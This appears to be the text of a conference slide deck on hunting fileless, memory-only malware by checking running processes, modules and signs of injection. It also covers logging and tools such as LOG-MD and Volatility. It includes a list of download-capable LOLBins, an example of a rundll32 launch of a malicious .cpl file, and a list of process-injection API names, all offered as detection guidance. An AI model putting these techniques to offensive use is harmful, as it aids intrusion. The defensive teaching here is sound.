You need a PROcess to catch running processes and their modules_v2.0

You need a PROcess to check your
running processes and modules.
The bad guys, and red teams are
coming after them!
Michael Gough – Principal NCC Group
Founder MalwareArchaeology.com
& IMFSecurity.com
MalwareArchaeology.com

Who am I
• Blue Team Defender Ninja, Malware Archaeologist, Logoholic and
Principal Incident Response Engineer for
• I love “properly” configured logs – they tell us Who, What, Where,
When and hopefully How
Creator of
“Windows Logging Cheat Sheet”
“Windows File Auditing Cheat Sheet”
“Windows Registry Auditing Cheat Sheet”
“Windows Splunk Logging Cheat Sheet”
“Windows ATT&CK Logging Cheat Sheet”
“ARTHIR – ATT&CK Remote Threat Hunting Incident Response tool”
• Co-Creator of “Log-MD” – Log Malicious Discovery Tool
• And co-host of “THE Incident Response Podcast”

Why this talk?

Because these can’t tell you enough

Or this

Fileless in memory only malware
• To address this expanding threat that is
becoming more and more common
– Too common
• Commodity malware, Red Team engagements,
and of course APT attackers use it
• This method can avoid many security tools

Let’s rethink or
redefine
Fileless Malware

Marketing- Scareware
• I get it, saying “Fileless” is an easy way to sum up
a threat for management, sales, products, etc. to
sum up and understand a new type of threat
• But for those of us having to deal with it from an
IR or Forensik perspective, we need more than
just the word “fileless”
• So let’s take a look at another more detailed way
to look at fileless malware that immediately tells
us something, and how to go about looking for it
https://conference.forensik.ca/

Rethinking Fileless Malware
• Fileless Malware that can only be found in the memory of a
running system (Malware + Memory = Memware)
• No files can be found if you scan the disk while the system
is running
– Or are very short lived, just long enough to load (bypasses FIM)
• Typical infection vectors are:
– Injection
– Dll side-loading/Hijacking
– Process Hollowing
– Download source code and compile on the fly, .NET, JSC
– User double-click, etc.
• “Fileless” malware, the file lives somewhere, so lets do a
better job guiding people where to look for signs of it

Other Fileless Malware types
• Regware – Malware payload is stored in the registry with an autorun/ASEP that
calls and loads it into memory (Malware + Payload in Registry = RegWare)
• WMIware - Malware payload is stored in the WMI database with an autorun/ASEP
that calls and loads it into memory (Malware + Payload in WMI database =
WMIWare)
• PowerShellware - Malware payload is in the form of PowerShell scripts,
downloaded or stored somewhere on the fly with an autorun/ASEP that calls and
loads it into memory (Malware + Payload in PowerShell = PowerShellWare)
• Compileware – Malware payload is not yet compiled, stored anywhere with an
autorun/ASEP that calls and loads it into memory (Malware + Payload compiled on
the fly = CompileWare)
• Downloadware – Autorun/ASEP calls out to the Internet to download malware
payload or source code that is then compiled and loads it into memory (Malware +
Payload downloaded each time = DownloadWare) maybe LOLBaSWare ;-)

Autoruns/ASEP
• Keep in mind…
– Not all malware will have an autorun/ASEP
• Latest TrickBot on Domain Controllers
• Especially the Red Team, doesn’t like to leave IOCs
– Or, the autorun is created on shutdown, then
deleted on startup once the malware loads
• Nothing found when doing live triage/analysis (Dridex)
– So what is in memory may be all that we can see

Latest TrickBot
PaloAlto Unit 42 - https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/

So how do we
find this stuff?

MITRE ATT&CK
• First - Everything you do should be mapped to
MITRE ATT&CK - https://attack.mitre.org/
• Some of the techniques used
– T1500 – Compile After Delivery
– T1127 - Trusted Developer Utilities
– T1055 – Process Injection
– T1196 – Control Panel Items
– etc
• Sub-techniques are here !!!

MITRE ATT&CK – Sub-techniques
• T1574 – Hijack Execution Flow
• 11 Sub-techniques
– 1574.002 - Dll side loading is just one of them
• T1055 – Process Injection
• 11 Sub-techniques
– 1055.002 – Portable Execution Injection

We need a PROcess
• We need to create a PROcess to start looking
for this condition
• Tools are just not preventing this technique
• We need to build this PROcess into our
hourly/daily/weekly/monthly routines to
detect and alert for this technique
• We need to build this PROcess into our
daily/weekly/monthly/yearly routines to
Threat Hunt for this technique
Canadian Andrew Hay

Two basic ways
1. Dump memory and analyze the memory
dump
– Use a tool like Volatility and all the plug-ins
2. Check running processes and their modules
for signs of additional (DLL) or injected code
– Use a tool like LOG-MD-Premium to scan a live
system for modifications to running processes and
their modules

Finding Memware
• Traditional forensics has us dumping a memory image
and running tools like Volatility against it
• Logs can contain a lot of details that can alert you to
this behavior, IF you collect THEN detect OR hunt
– Process command line is KEY to catching these attacks
• Checking running processes and their modules on a live
system is a GREAT option
– Better yet look for signs of injection !!
• Look for the other artifacts, autorun/ASEP, registry keys
storing scripts and/or payloads, WMI databases storing
scripts and/or payloads, and odd PowerShell, large
blocks, obfuscation, etc.

Signs of Injection
• What does this look like?
• A running process shows signs of additional or
replaced code
• This condition is detectable by a few tools
• And an obvious indicator of bad
• Yes, some system drivers will show up here too

Example LOG-MD-Premium
• -proc Check running processes & modules
• -md Exclude known good processes UNLESS there is
signs of injection
• -i List processes with signs of injection
• - b9 Static evaluate the file to determine malicious
likelihood and dump strings
• -vt Lookup the hashes of the modules for any
indications of known bad
• -x Dump all files that show signs of injection

B9 module static file evaluation
• "B9 Result ":" 'Bad.exe', is likely suspicious
• Name":" Bad.exe",
• "Size":" 218624",
• "MD5":" c4f3974b6eda003b0fa3ac230b24dd49",
• "SHA1":" a9a8c1123bb8dc4dbd0ea9635792b7f3c9462e38",
• "SHA256":" 7218ad69dfae486e8ceba58d732ff91c0dbfe2615a14ed32e2addcb9aa660157"
• "SHA512":"
5ae8c1e2895e794857e6a346cc7a3ca5358718c560b5f0090de35a6cbaeb927fc9cfdfc09ad86a10fb3
414a966485bb68ddcce22103e7e153fef5584527b7538",
• "CRC32":" ea619216",
• "SSDEEP":"
3072|pQ0n3fFiFjwk5vl8E5cYkx9psaiNcJNuyJZfb5N/z4n6feAg0FujGV8umEmDP0|/MFswtDqdOamiN
udAOlymz",
• "PDB Path":" ",
• "VSInfo":" 1",
• "Entropy":" 6.576878",
• "FilePacker":" No matches found.",
• "Imphash":" 2f0d6f69089f07b10ab46e6a615c6fd4",
• "Certificates":" None found.",
• "B9 Result ":" 'Bad.exe', is likely suspicious.“

Examples
• Kovter injects into SvcHost 32bit
• Qakbot
• Dridex

Dumping/Extracting Files
• If you use a tool to extract or dump files from
memory to disk, you can statically evaluate
them
• Lookup the hashes in an API like VirusTotal
• Evaluate the makeup of the file to determine
Good, Suspicious, or Malicious indicators
• Extract Strings
• Reverse the files if needed

Dumping/Extracting Files
• You can use a memdump and Volatitility to
extract files, Dlls, and Drivers
– --dump-dir=VolatilityFiles
– --dump-dir=VolatilityDlls
– --dump-dir=VolatilityDrivers
• You can use LOG-MD-Premium to extract files
– LOG-MD-Premium -proc -md -i -x

Extracted Files LOG-MD & Volatility
• QakBot
• Kovter
• Dridex
• Evaluated with LOG-MD B9 module

Details of the files
• You can look for simple indicators
• Is it signed?
• MetaData - Actual filename vs Internal and Original
filename
• Is it packed
• Hash lookups to an API
• File upload to an API
• Determine the makeup of the file for Likely “Good”,
”Suspicious”, or “Malicious”

Downloadware Examples
• They can call out to the Internet to download
the code to compile, or fetch the malware so
it does not live on disk. Some examples:
– CobaltStrike and Sythe custom malware packages
– LoLBins/LoLBas – Rundll32, Regsvr32, Regasm, etc.
• https://github.com/LOLBAS-Project/LOLBAS
– Compilers - Csc.exe, MSBuild.exe, JSC.exe, etc.
– May write to disk on shutdown, delete on startup

CSC.exe example
• <random.cs>
• <random.cmdline>
• Csc.exe /noconfig /fullpaths @
https://blog.didierstevens.com/2019/10/15/powershell-add-type-csc-exe/

Why Running Processes
• SPEED
• It is far faster and more scalable option to scan a
system LIVE for running processes and their
modules
• Dumping memory takes time
• Determining the Imageinfo takes a LONG time
• Running all the plugins takes time

Control Panel Applets
• .CPL files are all those Control Panel applets
– Rundll32 C:<whateverdir>Fakejava.cpl
• Launches a bad Dll into memory - LOLBIN
• .cpl files load all the time, so it’s noisy
• 3rd party applets are not well signed
• Many EDRs do not alert on this method
• The Red Team LOVES this method - CobaltStrike

Control Panel Applets
• This is probably the #1 Red Team attack
method
– LOLBin (Control.exe and RunDll32.exe)
• HARD to detect due to normal noise
• EDR is poor at this method
• So how do you catch this highly used and
successful method?

Catching Control Panel Applets
• Logging executions (4688)
• Look for .cpl files and/or Control.exe and/or
RunDll32.exe
• Baseline what is normal
• Create a PROcess
• Paths will be the same as normal
• Static analyze these .cpl files, whatever the
extention

LOLBin/LOLBaS
• Oddvar Moe - https://lolbas-project.github.io/
• Listen to our podcast on the subject

NIX PRO Tip
• It is easy for NIX rootkits to hide things
• But there is a /proc directory
• Which is also easy to hide stuff from ll or ls-l, you
don’t see a hidden /proc dir
• If we know what is in the file in each /proc/<pid>
then we can look for the execution line
– ls -al /proc | awk '{print $9}' | sort -n > proc-list.txt
– for i in {1..40000}; do if test -d /proc/$i; then if ! grep -
q ^$i$ proc-list.txt; then ls -al /proc/$i/exe; fi; fi; done
| grep "root" | grep -v -f known_good_proc.txt >
odd_proc.txt

Monitoring for
and
Threat Hunting

Monitor for & Threat Hunting
• We need to develop a PROcess to monitor/detect
for and/or Threat Hunt for signs of these
techniques
• Step 1
– Enable the data (enable the logging)
– Configure logs per the Windows Logging Cheat
Sheet(s)
– Enable to collect ‘Process Command Line’
• Step 2
– Create detections for many of these techniques
– Process command line is KEY.. It’s in the parameters

Step 3
• Come up with a PROcess to scan Running
Processes and their loaded Modules
– Detect these memory only infections
– This should be both for regular detection and for
Threat Hunting
– Watch for indications of injection

Static eval files for Strings
• You can eval files for known indicators of
strings that may indicate injection
• The LOG-MD-Premium B9 module not only
looks at the structure of the file to determine
likely “Good”, “Suspicious”, or “Malware”
• But also dumps strings to allow eval of the
existence of strings that further indicates the
file is malicious

B9 static file evaluation - Strings
• "B9Words":" List of words in file.",
• "!This program cannot be run in DOS mode."
• "JtRich"
• ".text"
• "`.rdata"
• "@.data"
• ".gfids"
• "GetProcessHeap"
• "FindClose"
• "FindFirstFileExA"
• "FindNextFileA"
• "IsValidCodePage"
• "GetCommandLineA"
• "GetCommandLineW"
• "GetEnvironmentStringsW"
• "FreeEnvironmentStringsW"
• "SetStdHandle"
• "WriteConsoleW"
• "ReadConsoleW"
• "CreateFileW"
• "HeapSize"
• "SetEndOfFile"
• "_CorDllMain"
• "mscoree.dll“
• "Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED."
"string too long"
"invalid string position"
"bad allocation"
"identifier removed"
"illegal byte sequence"
"interrupted"
"invalid argument"
"io error“
"is a directory"
"message size"
"network down"
"network reset"
"network unreachable"
"no buffer space"
"no child process"
"no link"
"no lock available"
"no message available“
"no message“
"no protocol option"
"no space on device“
"no stream resources"
"no such device or address"
"no such device"
"no such file or directory"
"no such process"
"not a directory"
"not a socket"
"not a stream"
"not connected"
"not enough memory"

Strings
• Maybe a PROcess to scan strings for API calls such as;
– OpenProcess
– VirtualAlloc
– VirtualAllocEx
– WriteProcessMemory
– LoadLibrary
– LoadLibraryA
– CreateRemoteThread
– ResumeThread
– ReflectiveLoader()
– OpenProcess
– GetProcAddress
– CreateProcess
– ZwUnMapViewOfSection
– NtUnmapViewOfSection
– GetThreadContext
– SetThreadContext
– ResumeThread

Watch for Downloading
LOLBin/LOLBaS
• Malicious code has to be downloaded
• Advanced attackers and Red Teams will use
the LOLBin and Scripts LOLBaS to download
the payload
• Alert on these
• Baseline the normal, there will NOT be many
• Watch these executions closely

LOLBINS/LOLBAS that can download
• powershell.exe
• bitsadmin.exe
• certutil.exe
• psexec.exe
• wmic.exe
• mshta.exe
• mofcomp.exe
• cmstp.exe
• windbg.exe
• cdb.exe
• msbuild.exe
• csc.exe
• regsvr32.exe
• Excel too !!!
Short list per Cisco Talos
• mshta.exe
• certutil.exe
• bitsadmin.exe
• regsvr32.exe
• powershell.exe
https://blog.talosintelligence.com/2019/11/hunting-for-lolbins.html
Process Command Line is KEY
Map to MITRE ATT&CK

NIX LOLBins - GTFObins
• https://gtfobins.github.io/

Best options for PROcess tools
• Log Management is your BEST friend here
– If you have, and can afford to put agents on all your
endpoints and collect the needed data
• If not, then you will need a PROcess to manually
check running process, their modules and signs of
injection
• LOG-MD-Premium, Systeinternals, Sysmon (ID 8
& 10), using WinRM and ARTHIR, Memory dump
with Volatility are possible options

CONCLUSION

Conclusion
• Create a PROcess to look at running processes
and their modules
• Look for signs of injection
• Log the process command line execution
• Watch the LOLBaS utilities
• Monitor for the executions discussed in this
presentation

Some tools to consider
Please let me know of any others
• LOG-MD-Premium
– Running Process and Modules, Injection, and B9 static file analysis
• Volatility
– https://www.volatilityfoundation.org/
– HollowFind Plugin (Win 10 compatible?)
• https://github.com/monnappa22/HollowFind
• PESieve (Opensource)
– https://github.com/hasherezade/pe-sieve
• Get-InjectedThread.ps1
– https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
• PSReflect
– https://github.com/mattifestation/PSReflect

Some tools to consider
Please let me know of any others
• GRR
– https://github.com/google/grr
• Rekall
– http://www.rekall-forensic.com/home
• InVtero
– https://github.com/ShaneK2/inVtero.net
– https://github.com/seancomeau/inVtero.net
• MemHunter (Old, requires .NET 3.5)
– https://github.com/marcosd4h/memhunter

Resources
• Red Canary Presentation
– ATT&CK Deep Dive: Process Injection
• Article on MITRE ATT&CK Sub-Techniques (coming soon)
– https://medium.com/mitre-attack/attack-sub-techniques-
preview-b79ff0ba669a
• DeepInstinct - Process Injection and Manipulation
– https://www.deepinstinct.com/2019/09/15/malware-evasion-
techniques-part-1-process-injection-and-manipulation/
• EndGame – Hunting in Memory
– https://www.slideshare.net/JoeDesimone4/taking-hunting-to-
the-next-level-hunting-in-memory

Resources
LOG-MD.COM
• Websites
– Log-MD.com The tool
– ARTHIR.com Free on GitHub
• The “Windows Logging Cheat Sheet(s)”
– MalwareArchaeology.com
• This presentation and others on SlideShare
– Search for MalwareArchaeology or LOG-MD

Questions?
LOG-MD.COM
You can find us at:
• Log-MD.com
• @HackerHurricane
• MalwareArchaeology.com

You need a PROcess to catch running processes and their modules_v2.0

More Related Content

What's hot (20)

Similar to You need a PROcess to catch running processes and their modules_v2.0 (20)

More from Michael Gough (8)

Recently uploaded (20)

You need a PROcess to catch running processes and their modules_v2.0